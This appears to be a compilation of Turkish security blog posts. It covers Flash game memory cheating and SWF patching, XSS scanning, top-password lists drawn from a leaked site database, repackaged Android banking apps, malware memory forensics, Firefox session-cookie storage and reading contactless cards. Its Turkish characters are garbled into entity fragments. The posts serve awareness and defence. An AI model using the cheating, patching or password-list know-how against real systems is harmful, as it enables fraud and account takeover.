bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 5: Hack 4 Career - 2011

5

Zararlı yazılım ile ilgili daha fazla bilgi almak iccedilin Volatility ile bellek dosyasını incelemeye başladım

İlk olarak PSLIST komutu ile sistem uumlzerinde ccedilalışan işlemleri (process) listeledim ve ccedilalıştırılma zamanına goumlre zararlı yazılımın sistemuumlzerinde 2888 PIDsine sahip indekexe adı altında ccedilalıştığını goumlrduumlm

6

DLLLIST komutu ile zararlı yazılım tarafından yuumlklenen DLL dosyalarını listelediğimde ise urlmondll ve cryptdlldll dosyaları şuumlpheliduruyordu

7

CONNSCAN komutu ile sistem uumlzerindeki aktif ağ bağlantılarını listelediğimde ise 2888 PIDsi ile ccedilok sayıda bağlantı kurulduğunugoumlrduumlm

PROCEXEDUMP komutu ile indekexe yazılımına ait olan belleği diske kaydettikten sonra strings ve IDA PRO programları ileincelediğimde ise bu zararlı yazılımın SDBOTın bir varyantı olduğunu kolayca anladım

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

